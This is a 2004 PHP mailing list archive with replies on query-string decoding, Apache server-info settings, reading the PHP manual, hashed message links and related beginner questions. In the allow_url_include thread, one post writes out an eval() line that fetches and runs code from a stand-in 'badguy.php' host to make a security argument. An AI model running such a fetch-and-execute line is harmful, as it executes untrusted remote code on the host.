anywhere near PHP.  If you're referring to echoing out URLs with query
strings on them, then that is one of the few instances where urlENcode()
might be necessary, but definitely not urlDEcode().

 Lastly, I wasn't concerned about the hex code, but I
 just made some reconnections of scripts.  Users can
 save their search parameters.  I am saving the query
 string.  Now I had this set up before and the way it
 was working , is when the user wanted to view or
 edit their saved searches, the search page would come
 back with all the parameters filled in including
 shaded parameters in things like multi select lists and
 menu dropdowns.  It's not working that way now , so my
 first suspicion is perhaps the hex is affecting it.

All I can say to this is to re-iterate the point that your Web server should
be decoding those %xx values before your script ever gets to see them.  You
*may* have to urlencode() values you write out that might one day form part
of a clickable link -- but, because of the previous sentence, you should not
yourself need to do the compensating urldecode() in the target script.

Once again, this sounds like a situation where you need to be echoing out
everything and anything of even the slightest relevance at the crucial spots
of your script -- in the debugging phase, my scripts often have a bunch of
debugging echoes every few lines, and some sections even end up with more
temporary echoes than actual script!  It's tedious wading your way through
the screenfuls of output, but can be exceedingly illuminating of an elusive
problem.

Cheers!

Mike

-
Mike Ford,  Electronic Information Services Adviser,
Learning Support Services, Learning  Information Services, JG125, James
Graham Building, Leeds Metropolitan University, Headingley Campus, LEEDS,
LS6 3QS,  United Kingdom
Email: [EMAIL PROTECTED]
Tel: +44 113 283 2600 extn 4730  Fax:  +44 113 283 3211




Re: [PHP] MYSQL Query question

2004-12-09 Thread John Nichel
Raditha Dissanayake wrote:
Reinhart Viane wrote:
And a last question:
I always seem to get stuck on mysql queries when scripting. mysql.com
gives me a headache when searching something. Does someone know a good
mysql manual site or a good mysql book?
 

That does not mean mysql questions should be posted on php mailing lists.
<snip>
There you go again, trying to keep this list on topic. ;)
--
John C. Nichel
ÜberGeek
KegWorks.com
716.856.9675
[EMAIL PROTECTED]


Re: [PHP] Re: Installing Apache and PHP from scratch

2004-12-09 Thread Jason Wong
On Thursday 09 December 2004 22:12, Don wrote:

 1. In my httpd.conf file I uncommented the following lines:
 <Location /server-info>
 SetHandler server-info
 Order deny,allow
 Deny from all
 Allow from .lclnav.com
 </Location>

That Allow from ... has to specify an IP address / network range / domain 
(etc) that will allow your *client* to connect.

If you have shell access on the server and you have lynx/links/elinks 
installed then you should probably only Allow from 127.0.0.1 and just 
access it directly from the server rather than through a remote client.

 Note: I created the directory 'server-info' off of the directory root after
 the error; still errors

You don't need to create any directories for the above to work.

As this is not PHP-related if you need more info refer to the Apache docs 
and/or ask on the Apache mailing list.


-- 
Jason Wong - Gremlins Associates - www.gremlins.biz
Open Source Software Systems Integrators
* Web Design & Hosting * Internet & Intranet Applications Development *
--
Search the list archives before you post
http://marc.theaimsgroup.com/?l=php-general
--
/*
BOFH Excuse #116:

the real ttys became pseudo ttys and vice-versa.
*/




Re: [PHP] a question about the PHP manual

2004-12-09 Thread Miles Thompson
At 09:56 AM 12/9/2004, Eakin, W wrote:
Hello,
   As I'm studying, and learning, PHP, I use certain resources again and 
again. A few books I've bought, some web sites, this mailing list, and 
the PHP manual. I've taken the often repeated 'RTFM' to heart, and I 
attempt to google or RTFM before considering a post to the list with a 
question, but now I have a question about the manual itself.
I've noticed that most of the replies to the questions on this list, when 
they refer to a part of the manual,  point to the same few sections over 
and over. Such as arrays, strings, sessions, objects, and a few others.
My question is this, when I'm reading the manual, is just that I should be 
concentrating on a few sections (and if so, which?), or should I be giving 
equal attention to all the sections, including some (I suppose) I might 
never use.

Thoughts?
thanks,
William

Well, those are commonly used parts of the language, along with control 
structures (IF, WHILE, CASE).

Once PHP is installed, familiarity with Chapters 10 through 42 would 
furnish a really solid grounding.

Then I'd look at the function list and focus on the functions applicable to 
your particular database and the error handling and logging functions.

After that, it depends on your programming experience, as how one thinks in 
language a may be subtly different language b. Note that there are both 
directory and file system functions; the separation is logical, but sent me 
on a worried hunt a couple of years ago. Thus we reach the land of "it 
depends on what you want or have to do".

In closing, I'd recommend writing little test scripts so that you can do 
two things:
1. Figure out how to use the various functions and how they behave.
2. Then intentionally break them - knowledge of this behaviour can 
be just as important.

Alternately, like many, dig out the info as it's needed. The problem with 
this approach is missing out on new and better ways of doing things, and 
you don't enrich your toolkit. As for "some (I suppose) I might never use" 
- just how much time do you WANT to spend with your computer? How do the 
others in your life feel about that?

Cheers - Miles


Re: [PHP] a question about the PHP manual

2004-12-09 Thread Ron Clark


At 09:56 AM 12/9/2004, Eakin, W wrote:
Hello,
As I'm studying, and learning, PHP, I use certain resources again and
 again. A few books I've bought, some web sites, this mailing list, and
 the PHP manual. I've taken the often repeated 'RTFM' to heart, and I
 attempt to google or RTFM before considering a post to the list with a
 question, but now I have a question about the manual itself.
I've noticed that most of the replies to the questions on this list, when
they refer to a part of the manual,  point to the same few sections over
and over. Such as arrays, strings, sessions, objects, and a few others.
My question is this, when I'm reading the manual, is just that I should be
concentrating on a few sections (and if so, which?), or should I be giving
equal attention to all the sections, including some (I suppose) I might
never use.

I have found that when learning a new language it is a good idea to
read the whole manual if time permits, even if there are sections that you
don't think you will ever need. Later on when programming you may need to
do something and remember that function that you never thought you would
need. It never hurts to know what's available even if you don't think you
will need it.

Ron Clark
System Administrator
Armstrong Atlantic State University




Re: [PHP] a question about the PHP manual

2004-12-09 Thread Nick Talbott
On Thursday 09 December 2004 1:56 pm, Eakin, W wrote:
 I've noticed that most of the replies to the questions on this list,
 when they refer to a part of the manual,  point to the same few sections
 over and over. Such as arrays, strings, sessions, objects, and a few
 others. My question is this, when I'm reading the manual, is just that I
 should be concentrating on a few sections (and if so, which?), or should I
 be giving equal attention to all the sections, including some (I suppose) I
 might never use.

Here's a suggestion...

Go through Section III on Language Reference thoroughly.  You'll need to 
understand pretty much all of this.

Skim through sections IV and V (Security and Features) so you know what's there 
and come back to them before you use PHP in a real application (specially the 
Security section!)

In the function reference, look in detail at the following sections:
- Array functions
- Date and Time functions
- Directory Functions
- Filesystem functions
- String Functions
- Variable Functions
- plus the specific section for the database you want to use
The above are all pretty common requirements in most PHP applications.

Then skim through the following sections and come back to them when you need to 
use them:
- Error Handling and Logging Functions
- HTTP Functions
- Miscellaneous Functions
- Network Functions
- Regular Expression Functions

Then dig into the other sections in the function reference that interest you.

My 2p

- Nick


-- 
Nick Talbott, Powys County Council, UK
IT Policy and Strategy Manager/Rheolwr Polisi a Chynllunio TGCh

email: [EMAIL PROTECTED]
fax:   01597 824781
web:   www.powys.gov.uk




RE: [PHP] Question:maybe urldecode

2004-12-09 Thread Stuart Felenstein

--- Ford, Mike [EMAIL PROTECTED] wrote:

  Lastly, I wasn't concerned about the hex code, but
 I just made some reconnections of scripts.  Users
 can save their search parameters.  I am saving the
 query string.  Now I had this set up before and the 
 way it was working , is when the user wanted to   
 view or edit their saved searches, the search page  
 would come back with all the parameters filled in   
 including shaded parameters in things like multi
 select lists and menu dropdowns.  It's not working  
 that way now so my first suspicion is perhaps the
 hex is affecting it.


I'm not sure if this particular is a matter of
debugging.  There is a different behaviour going on
and now I'm not sure if it would have anything to with
the hex.  The textfields in the query string are just
the variable name = value.  

Basically I'm throwing this out though since I'm
wondering if there is something that should be in the
search script , that when I apply a query string to it
would fill in the field (like magic hands)

As an example, if you click on the link , you'll see
industry has 2 choices selected , and city has a
value.
Now I can't reproduce this with my new script.

http://www.lurkingforwork.com/LFWSearch.php?s_Industry[]=2&s_Industry[]=3&s_LocationCity=Bronx&s_JobTitle=&s_PostStart=&VendorJobsPageSize=


Stuart




Re: [PHP] MYSQL Query question

2004-12-09 Thread Raditha Dissanayake
John Nichel wrote:
Raditha Dissanayake wrote:
Reinhart Viane wrote:
And a last question:
I always seem to get stuck on mysql queries when scripting. mysql.com
gives me a headache when searching something. Does someone know a good
mysql manual site or a good mysql book?
 

That does not mean mysql questions should be posted on php mailing 
lists.
<snip>
There you go again, trying to keep this list on topic. ;)
Alright I am going to change. as they say if you can't beat them join them.
obligatory off topic post:
Do you think it's better to use innodb type tables or myisam type tables 
when using mysql even without  foreign keys?

--
Raditha Dissanayake.
--
http://www.radinks.com/print/card-designer/ | Card Designer Applet
http://www.radinks.com/upload/  | Drag and Drop Upload 



[PHP] Finding the location of an included script

2004-12-09 Thread Gadi Cohen
Is this possible?

I'm trying to write a back end to be used in most of my websites.

While I can simply use symlinks to ensure this is included from my
various sites but only exists once on the hard drive, I'd prefer to simply
include the file and have the script itself work out where it lives.

So if I have:  include("/path/to/backend.php");

Is there a way from inside of backend.php to return /path/to ?

Gadi




Re: [PHP] Question:maybe urldecode

2004-12-09 Thread Jason Wong
On Thursday 09 December 2004 23:16, Stuart Felenstein wrote:

 I'm not sure if this particular is a matter of
 debugging. 

Your program doesn't work the way you intended it? So if you don't debug it, 
how is it going to get from a not working as intended state, to a working 
state?

 There is a different behaviour going on 
 and now I'm not sure if it would have anything to with
 the hex.  The textfields in the query string are just
 the variable name = value.

So what do the variables contain at each stage? Where do they change from 
what you expected to not what you expected?

 Basically I'm throwing this out though since I'm
 wondering if there is something that should be in the
 search script , that when I apply a query string to it
 would fill in the field (like magic hands)

Yeah I wish I had some magic hands that writes my programs for me too. 
Sadly ...

-- 
Jason Wong - Gremlins Associates - www.gremlins.biz
Open Source Software Systems Integrators
* Web Design & Hosting * Internet & Intranet Applications Development *
--
Search the list archives before you post
http://marc.theaimsgroup.com/?l=php-general
--
/*
The days are all empty and the nights are unreal.
*/




Re: [PHP] Question:maybe urldecode

2004-12-09 Thread Stuart Felenstein

--- Jason Wong [EMAIL PROTECTED] wrote:

  Basically I'm throwing this out though since I'm
  wondering if there is something that should be in
 the
  search script , that when I apply a query string
 to it
  would fill in the field (like magic hands)
 
 Yeah I wish I had some magic hands that writes my
 programs for me too. 
 Sadly ...
 
Jason, I don't think you read or understood my
question. As I said, it doesn't seem to be a debugging
scenario. I was asking if anyone would know a
reason why on one page , one could apply the query 
string to  url and the page would be filled in and
another page it doesn't work.  Please don't imply I'm
looking for someone to write my programs. The magic
hands was a reference to how the boxes are filled in
by placing the string in.

Stuart  




[PHP] Re: Finding the location of an included script

2004-12-09 Thread Ben Ramsey
Gadi Cohen wrote:
 So if I have:  include("/path/to/backend.php");
 Is there a way from inside of backend.php to return /path/to ?

Check out the filesystem functions in the PHP manual. You're probably 
particularly interested in pathinfo()

http://www.php.net/pathinfo
--
Ben Ramsey
Zend Certified Engineer
http://benramsey.com
---
Atlanta PHP - http://www.atlphp.org/
The Southeast's premier PHP community.
---


Re: [PHP] a question about the PHP manual

2004-12-09 Thread Richard Lynch
Eakin, W wrote:
 Hello,
 As I'm studying, and learning, PHP, I use certain resources again
 and again. A few books I've bought, some web sites, this mailing list,
 and the PHP manual. I've taken the often repeated 'RTFM' to heart, and I
 attempt to google or RTFM before considering a post to the list with a
 question, but now I have a question about the manual itself.
 I've noticed that most of the replies to the questions on this list,
 when they refer to a part of the manual,  point to the same few sections
 over and over. Such as arrays, strings, sessions, objects, and a few
 others.
 My question is this, when I'm reading the manual, is just that I should
 be concentrating on a few sections (and if so, which?), or should I be
 giving equal attention to all the sections, including some (I suppose) I
 might never use.

I would recommend reading EVERYTHING in the PHP manual UP TO
Section VI: Function Reference

All of that stuff is what defines the core PHP Language, and if you don't
know it, you're going to waste a lot of time on Voodoo Programming.

Voodoo Programming: You do things that work but you have completely
erroneous beliefs about *why* and *how* they work.

If you know the jargon for what you are looking for, Google is your buddy;
But if you don't, and can only describe what you want in a paragraph of a
question, then re-read all of that, plus the FAQs.

You then want to skim through the main page of each function reference
section.  Currently that's 135 (!) pages.  Some of them you can quickly
dismiss as irrelevant for all time to me :-)  Others, you'll find out
that there's an entire science to something you thought you'd have to
invent for yourself.

Yes, that's a lot of reading.

No, you won't remember all of it.

Hell, you might not even understand all of it when you read it.

Once upon a time, I even posted an FAQ to the list, way back when, because
while I had *read* the FAQ initially, there were FAQs I didn't even
understand the Question to, much less the Answer.

Six months later, of course, I ran into the question in my own needs, and,
well, didn't *RE*-read the FAQ.

Take note of the stuff you don't understand at all, and try to memorize
the buzz-words or what you think they might be all about.

The hair you save may be your own. :-)

-- 
Like Music?
http://l-i-e.com/artists.htm




Re: [PHP] best practice question..

2004-12-09 Thread Richard Lynch
Guy Bowden wrote:
 On this note - what is considered best practice in a - sent to friend
 type thing.

 i.e. User inputs their name + message + email + friends email into a
 html/flash form

 friend gets a link to read the message.

 currently I do this:

 1 collect form input
 2 create hash using the md5/uniqid method : $hash = md5(uniqid($key));
 3 input data to database table using the hash as the primary key value
 4 send email to friend with link containing the hash
 5 user clicks on link
 6 hash read in from the $_GET object
 7 hash used to select message details from DB and displayed to the user

 There's never a security issue here - i.e. i don't mind how many times /
 who reads the message, but just want to make it hard to just guess keys
 to read other messages (otherwise it would just be the db id)

 This method works for me, but is it the *right* way?

I would also:

Track the sender IP address, and only allow N sends per time period T.
Track the recipient email, and only allow M To:s per time period U.

The point being to stop spammers from using your system to spam the world,
or target specific victims.

Is $key the ID in the database?  You may want to consider adding in more
randomness with mt_rand() as the manual suggests on the uniqid page -- You
can still keep $key as part of the hash by doing:
md5(uniqid("$key|" . mt_rand(), true))

Certainly sending the md5/uniqid as the only thing exposed is about as
good as you can get for making sure that the other email URLs are
guessable -- You do run the risk that sooner or later your md5/uniqid
hash will collide with two emails on the same value.  Easy enough to
check the db and generate another hash if they do collide, so I'd add that
in if you don't have it.  Add a line after your md5(...) call and set
$hash = '42' for testing purpose, then comment it out to go back to
reality.

You could look into the larger bits and longer hashes that would be
better but I really don't think that's necessary, imho.

-- 
Like Music?
http://l-i-e.com/artists.htm




Re: [PHP] duplicate md5 hash's

2004-12-09 Thread Richard Lynch
 GB Is there any way that the same hash could have been generated more
 GB than once?

 It's extremely unlikely (I cannot give you any stats as to how
 unlikely though, sorry).

As I understand it (or don't, rather) the odds are one in 2,147,...,... (2
billion)

But that's only in theory.

In practice, I think people have demonstrated that it's not really 1 in 2
billion.

It's still damned unlikely, but making *SURE* with the loop you've got is
cheap and easy, so I'd stick with that.

-- 
Like Music?
http://l-i-e.com/artists.htm
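
The token scheme from the "best practice question" reply and the collision check recommended above, combined into one added example (not code from the thread). It swaps md5(uniqid()) for random_bytes(), which draws from the operating system's CSPRNG; the arrays standing in for database tables, the limits and the function names are assumptions.

```php
<?php
// Added example. Arrays stand in for the database tables; the limits,
// addresses and function names are assumptions, not the poster's code.

const MAX_SENDS_PER_IP = 3;      // "N sends"
const WINDOW_SECONDS   = 3600;   // "per time period T"

// 128 bits from the OS CSPRNG, hex-encoded: the same length as an md5()
// string, but not derived from the clock or from a database id.
function new_token(): string
{
    return bin2hex(random_bytes(16));
}

// Store the message under a fresh token; if the token is already taken,
// generate another. $generate is injectable so the retry path can be forced.
function store_message(array &$messages, array $message, ?callable $generate = null): string
{
    $generate = $generate ?? 'new_token';
    for ($attempt = 0; $attempt < 5; $attempt++) {
        $token = $generate();
        if (!isset($messages[$token])) {   // with SQL: let the PRIMARY KEY reject duplicates
            $messages[$token] = $message;
            return $token;
        }
    }
    throw new RuntimeException('could not allocate a unique token');
}

// Sliding-window limiter keyed on sender IP; the same function can be keyed
// on the recipient address for the "M To:s per time period U" rule.
function allow_send(array &$log, string $key, int $now,
                    int $max = MAX_SENDS_PER_IP, int $window = WINDOW_SECONDS): bool
{
    $recent = array_values(array_filter(
        $log[$key] ?? [],
        function ($t) use ($now, $window) { return $t > $now - $window; }
    ));
    $allowed = count($recent) < $max;
    if ($allowed) {
        $recent[] = $now;
    }
    $log[$key] = $recent;
    return $allowed;
}

// Look a message up by the token taken from $_GET. Anything that is not
// exactly 32 lowercase hex characters is rejected before the store is touched.
function fetch_message(array $messages, $token): ?array
{
    if (!is_string($token) || !preg_match('/\A[0-9a-f]{32}\z/', $token)) {
        return null;
    }
    return $messages[$token] ?? null;
}

// --- demo with constructed data ---
$messages = [];
$sendLog  = [];

// Force a collision the way the reply suggests testing it: a generator that
// hands out the same fixed token twice before falling back to new_token().
$fixed = str_repeat('ab', 16);
$calls = 0;
$colliding = function () use (&$calls, $fixed) {
    return $calls++ < 2 ? $fixed : new_token();
};

$first  = store_message($messages, ['to' => 'friend@example.com', 'body' => 'hi'], $colliding);
$second = store_message($messages, ['to' => 'other@example.com', 'body' => 'hello'], $colliding);

var_dump($first === $fixed);                        // first insert took the fixed token
var_dump($second !== $first);                       // second insert retried after the collision
var_dump(fetch_message($messages, $second)['to']);  // lookup by token
var_dump(fetch_message($messages, 'not-a-token'));  // malformed token is rejected

// Five send attempts from one constructed address inside the same window.
for ($i = 0; $i < 5; $i++) {
    var_dump(allow_send($sendLog, '203.0.113.7', 1000 + $i));
}
```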




RE: [PHP] a question about the PHP manual

2004-12-09 Thread Justin Palmer
Hi,

Richard is spot on, but learning (PHP, ASP, Java, ...) programming is
not all about reading.  Set up small examples that better enforce the
ideas in your mind about specific topics that you are having a hard time
with.  You will lose, roughly, 90% of the information by just reading.
Examples help solidify the theories.

Regards,

Justin Palmer
__
KISS (Keep It Simple, SEARCH)!
Google::getUri( http://www.google.com );
Archives::getUri( http://marc.theaimsgroup.com/?l=php-general );



-Original Message-
From: Richard Lynch [mailto:[EMAIL PROTECTED] 
Sent: Thursday, December 09, 2004 9:15 AM
To: Eakin, W
Cc: [EMAIL PROTECTED]
Subject: Re: [PHP] a question about the PHP manual


Eakin, W wrote:
 Hello,
 As I'm studying, and learning, PHP, I use certain resources again 
 and again. A few books I've bought, some web sites, this mailing list,
 and the PHP manual. I've taken the often repeated 'RTFM' to heart, and
 I attempt to google or RTFM before considering a post to the list with
 a question, but now I have a question about the manual itself. I've 
 noticed that most of the replies to the questions on this list, when 
 they refer to a part of the manual,  point to the same few sections 
 over and over. Such as arrays, strings, sessions, objects, and a few 
 others. My question is this, when I'm reading the manual, is just that
 I should be concentrating on a few sections (and if so, which?), or 
 should I be giving equal attention to all the sections, including some
 (I suppose) I might never use.

I would recommend reading EVERYTHING in the PHP manual UP TO Section
VI: Function Reference

All of that stuff is what defines the core PHP Language, and if you
don't know it, you're going to waste a lot of time on Voodoo
Programming.

Voodoo Programming: You do things that work but you have completely
erroneous beliefs about *why* and *how* they work.

If you know the jargon for what you are looking for, Google is your
buddy; But if you don't, and can only describe what you want in a
paragraph of a question, then re-read all of that, plus the FAQs.

You then want to skim through the main page of each function reference
section.  Currently that's 135 (!) pages.  Some of them you can quickly
dismiss as irrelevant for all time to me :-)  Others, you'll find out
that there's an entire science to something you thought you'd have to
invent for yourself.

Yes, that's a lot of reading.

No, you won't remember all of it.

Hell, you might not even understand all of it when you read it.

Once upon a time, I even posted an FAQ to the list, way back when,
because while I had *read* the FAQ initially, there were FAQs I didn't
even understand the Question to, much less the Answer.

Six months later, of course, I ran into the question in my own needs,
and, well, didn't *RE*-read the FAQ.

Take note of the stuff you don't understand at all, and try to memorize
the buzz-words or what you think they might be all about.

The hair you save may be your own. :-)

-- 
Like Music?
http://l-i-e.com/artists.htm




Re: [PHP] Question: urldecode

2004-12-09 Thread Richard Lynch
Stuart Felenstein wrote:
 In my search page, the url returned comes back with
 the ..err I forget what it's called, but query string
 looks like this: %5B%5D=3.  I think the %5B and 5D
 should be [].

 What I think is needed is rawurldecode.  I've looked
 through my code and think it belongs somewhere in this
 block:

Don't guess.

Figure out *EXACTLY* where and when the URL is being encoded to Hex --
where it first appears in your scripts/database/application as %5B.

Decide if it's right for it to be in Hex at that point.


If it's not right for it to be Hex at that point, change it there.

You'll drive yourself crazy changing it here, where it's already in the
system in a format you don't want.

My *GUESS* is that you're taking the QUERY string and stuffing it into
your database.

Since you grab the raw query string, it's in Hex-encoded format.

Maybe that's a Good Thing to store in your database.

Maybe it's not.

All depends what you're going to do with it in the *REST* of the application.

But I cannot stress enough that you've got to understand where and how
this data is coming from, in what format, and *DESIGN* your application to
have the data you want in the place you want.

Going about it like you are now, just sort of guessing at what's there and
trying to slap in a patch to change it, is going to drive you crazy in the
long run.

Your solution isn't necessarily wrong:  Your approach to making the
decision is :-)

-- 
Like Music?
http://l-i-e.com/artists.htm
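
The decode-once behaviour Mike Ford describes earlier in this thread, and the save-and-restore flow discussed above, as an added example (not code from the thread). The field names and LFWSearch.php follow the URL Stuart posted; the raw query string, the option list and the function names are constructed assumptions.

```php
<?php
// Added example. The raw query string and option list are constructed.

// Raw query string as the browser sends it: "[]" arrives as %5B%5D, and the
// city value carries an encoded "&" and an encoded "+".
$raw = 's_Industry%5B%5D=2&s_Industry%5B%5D=3&s_LocationCity=Bronx%20%26%20Queens%2B1';

// parse_str() applies the decoding PHP performs when it fills $_GET, so these
// are the values a script sees without calling urldecode() itself.
parse_str($raw, $get);

// Decoding a second time changes the data: the literal "+" becomes a space.
$decodedTwice = urldecode($get['s_LocationCity']);

// Saving a search: encode the already-decoded values once, on the way out.
function save_search(array $params): string
{
    return http_build_query($params);
}

// Restoring a search: decode once and keep only the expected fields/types.
function restore_search(string $saved): array
{
    parse_str($saved, $params);
    $industry = $params['s_Industry'] ?? [];
    $city     = $params['s_LocationCity'] ?? '';
    return [
        's_Industry'     => is_array($industry)
            ? array_values(array_filter($industry, 'is_string'))
            : [],
        's_LocationCity' => is_string($city) ? $city : '',
    ];
}

// Re-fill a multi-select from the restored values, escaping for HTML.
function industry_select(array $options, array $selected): string
{
    $html = "<select name=\"s_Industry[]\" multiple>\n";
    foreach ($options as $id => $label) {
        $mark = in_array((string) $id, $selected, true) ? ' selected' : '';
        $html .= sprintf(
            "  <option value=\"%s\"%s>%s</option>\n",
            htmlspecialchars((string) $id, ENT_QUOTES),
            $mark,
            htmlspecialchars($label, ENT_QUOTES)
        );
    }
    return $html . "</select>\n";
}

// --- demo ---
$saved    = save_search($get);
$restored = restore_search($saved);
$options  = [1 => 'Accounting', 2 => 'Banking', 3 => 'Construction']; // constructed

var_dump($get['s_LocationCity']);   // decoded once by PHP
var_dump($decodedTwice);            // what an extra urldecode() does to it

echo industry_select($options, $restored['s_Industry']);
printf(
    "<input name=\"s_LocationCity\" value=\"%s\">\n",
    htmlspecialchars($restored['s_LocationCity'], ENT_QUOTES)
);

// A link carrying the saved search: URL-encoded once by http_build_query(),
// then HTML-escaped because it is written into an attribute.
printf(
    "<a href=\"LFWSearch.php?%s\">Saved search</a>\n",
    htmlspecialchars($saved, ENT_QUOTES)
);
```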




Re: [PHP] Question:maybe urldecode

2004-12-09 Thread Jason Wong
On Friday 10 December 2004 00:24, Stuart Felenstein wrote:

 Jason, I don't think you read or understood my
 question. 

sigh

 As I said, it doesn't seem to be a debugging 
 scenario. I was asking if anyone would know a
 reason why on one page , one could apply the query
 string to  url and the page would be filled in and
 another page it doesn't work. 

The obvious (and banal) answer is that the pages are different. Find out what 
the significant differences are. How? If you are a genius you could do that 
with your eyes closed just by comparing the source. If you are stupid like I 
am then you would have to go through the tedious task of examining the 
contents of the variables and figure out what the heck is happening.

-- 
Jason Wong - Gremlins Associates - www.gremlins.biz
Open Source Software Systems Integrators
* Web Design & Hosting * Internet & Intranet Applications Development *
--
Search the list archives before you post
http://marc.theaimsgroup.com/?l=php-general
--
/*
Q: What is printed on the bottom of beer bottles in Minnesota?
A: Open other end.
*/




Re: [PHP] allow_url_fopen ini directive not enough

2004-12-09 Thread Richard Lynch
Kelvin Jones wrote:
 I would like to see a new directive to go alongside allow_url_fopen to
 allow people to turn on or off the ability to include/require a remote
 file.

 The ability to include and execute a file as php from a remote host
 leaves many applications open to cross-site-scripting attacks.
 This would be easily avoidable if we had a directive
 (allow_url_include?) that by default removed this capability.

Seems kinda pointless to me...

If a Programmer is dumb enough to include/require untrusted source code,
they can just as easily do:

eval(implode('', file('http://example.com/badguy.php')));

after you've turned OFF allow_url_include but left allow_url_fopen ON

If an attacker is managing to alter your PHP source to pull in his remote
PHP, then the remote PHP feature isn't really all that crucial -- It's
more convenient for them to suck it in from their remote server, perhaps,
or maybe they are worming through a database field that is too short to
hold all their source, so they shove in an include -- Still, *any* PHP
code they can execute will eventually give them control anyway.

If an attacker gains access to remote trusted source and replaces it,
then your decision to trust that source was faulty -- Which is neither
helped nor hindered by the remote include function, really.  If you needed
that source, you can find a way to get it and have PHP evaluate it, unless
you disable all remote file access completely... Even then, a cron job to
snag it with wget, and an include, and you're back at Square One.

I guess I'm saying that only education and diligence by programmers is
going to avoid this attack.  Turning off only the remote include, but not
remote fopen, won't stop anybody with half a clue for more than 30
seconds.

This is just my take on it, and there could easily be subtle issues or
known exploits you are trying to squash of which I know nothing.

-- 
Like Music?
http://l-i-e.com/artists.htm
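
One way to apply the point made above, that the safeguard belongs in the program rather than in an ini switch: an added example (not code from the thread) in which the request only selects a key from a fixed map. The directory layout, page names and resolve_page() are assumptions, and the demo builds its files in a temporary directory.

```php
<?php
// Added example. Page names and directory layout are assumptions.

// Pattern the thread warns about: the include target is taken from the
// request, so whatever the client sends reaches include unchanged.
//     include $_GET['page'] . '.php';

// Hardened form: the request only selects a key; the file name comes from a
// fixed map and the resolved path must sit inside the pages directory.
function resolve_page(string $baseDir, array $pages, $requested): ?string
{
    if (!is_string($requested) || !isset($pages[$requested])) {
        return null;                        // unknown key, URL, wrapper, array
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $pages[$requested]);
    if ($base === false || $path === false) {
        return null;                        // mapped file does not exist
    }
    // Containment check: guards against a symlink or a bad map entry that
    // would lead outside the pages directory.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// --- demo with constructed files and inputs ---
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pages_' . bin2hex(random_bytes(4));
mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'home.php', '<?php echo "home page\n";');

// 'about.php' is listed but absent on purpose, to exercise the missing-file path.
$pages = ['home' => 'home.php', 'about' => 'about.php'];

$inputs = [
    'home',
    'about',
    'http://example.com/badguy.php',   // the URL used in the reply above
    '../../etc/passwd',
    ['home'],                          // page[]=home arrives as an array
];

foreach ($inputs as $input) {
    $path  = resolve_page($dir, $pages, $input);
    $shown = is_array($input) ? '(array)' : $input;
    printf("%-32s => %s\n", $shown, $path === null ? 'rejected' : basename($path));
    if ($path !== null) {
        include $path;                 // only ever a path built from the map
    }
}

unlink($dir . DIRECTORY_SEPARATOR . 'home.php');
rmdir($dir);
```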




[PHP] Unsubscribing Junk Emails From the List: requests@firstustrading.com

2004-12-09 Thread Justin Palmer
Hi,

Every time I send a response to the list I get an auto-reply from:
[EMAIL PROTECTED]

Is there someone that I could email that can delete this user from the
list?

Thanks for any information.

Regards,

Justin Palmer
__
KISS (Keep It Simple, SEARCH)!
Google::getUri( http://www.google.com );
Archives::getUri( http://marc.theaimsgroup.com/?l=php-general );




Re: [PHP] Finding the location of an included script

2004-12-09 Thread Jason Wong
On Thursday 09 December 2004 22:46, Gadi Cohen wrote:
 So if I have:  include("/path/to/backend.php");

 Is there a way from inside of backend.php to return /path/to ?

  echo __FILE__;

-- 
Jason Wong - Gremlins Associates - www.gremlins.biz
Open Source Software Systems Integrators
* Web Design & Hosting * Internet & Intranet Applications Development *
--
Search the list archives before you post
http://marc.theaimsgroup.com/?l=php-general
--
/*
I have never let my schooling interfere with my education.
  -- Mark Twain
*/




Re: [PHP] PHP4 mysqli with mysql 4.1.7?

2004-12-09 Thread Richard Lynch
Francis Mak wrote:
 mysqli_query($c, "SET CHARACTER SET utf8;");

The naive user, who understands *NOTHING* about i18l (?) functions,
character sets, or anything other than American English (and not all that
up on the esoterics of grammar in that) asks:

What happens in your application if you just do:

mysql_query("SET CHARACTER SET utf8", $connection) or die(mysql_error());

right after you connect to the database?

In an ideal world, you've told MySQL to use utf8, and that would be that.

Yeah, right.

Worth a try, since it will take you 5 seconds, and *might* just work

You may want to repeat your question on the PHP International list, if
that's still going.

-- 
Like Music?
http://l-i-e.com/artists.htm




Re: [PHP] help me split chars w/o spaces by 2... like: 2004

2004-12-09 Thread ApexEleven
I did something like this a while back, I believe I used chunk_split

[code]
<?php

$year_split = date("Y");
// chunk_split() inserts a line break after every 2 characters
$chars = chunk_split($year_split, 2);
print_r($chars);

?>
[/code]

it'll output something along the lines of:
20
04

Hope this helps,

-- 

Jasper Howard - Database Administration
ApexEleven.com
530 559 0107
---

On Thu, 9 Dec 2004 10:21:49 +0800, Louie Miranda [EMAIL PROTECTED] wrote:
 <?php
 $hello2 = chop($year_split);
 echo $hello2;
 ?>
 
 outputs: 2004
 
 Whats the correct syntax for it? The manual said..
 
 This function is an alias of rtrim().
 
 and:
 
 rtrim
 (PHP 3, PHP 4 )
 
 rtrim --  Strip whitespace from the end of a string
 
 
 
 
 On Wed, 08 Dec 2004 18:11:19 -0800, Tyler Replogle [EMAIL PROTECTED] wrote:
  have you tried using chop() ?
  # begin code
  $year_split = date("Y");
  $chars = chop($year_split);
  $chars[0] // = 2
  $chars[1] // = 0
  $chars[2] // = 0
  $chars[3]  //= 4
  # end code
  I hope that will help
 
  From: Louie Miranda [EMAIL PROTECTED]
  Reply-To: Louie Miranda [EMAIL PROTECTED]
  To: [EMAIL PROTECTED]
  Subject: [PHP] help me split chars w/o spaces by 2... like: 2004
  Date: Thu, 9 Dec 2004 09:55:57 +0800
 
 
  
  Help me split chars w/o spaces by 2... like: 2004
  How can i make it?
  
  first: 20
  second: 04
  
  Im working on this..
  
  # begin code
  $year_split = date("Y");
  $chars = preg_split('//', $year_split, -1, PREG_SPLIT_NO_EMPTY);
  # end code
  
  But it splits the whole 2004 string..
  
  Array
  (
   [0] => 2
   [1] => 0
   [2] => 0
   [3] => 4
  )
  
  
  --
  Louie Miranda
  http://www.axishift.com
  
  --
  PHP General Mailing List (http://www.php.net/)
  To unsubscribe, visit: http://www.php.net/unsub.php
  
 
 
 
 --
 Louie Miranda
 http://www.axishift.com
 
 --
 PHP General Mailing List (http://www.php.net/)
 To unsubscribe, visit: http://www.php.net/unsub.php
 
 


-- 

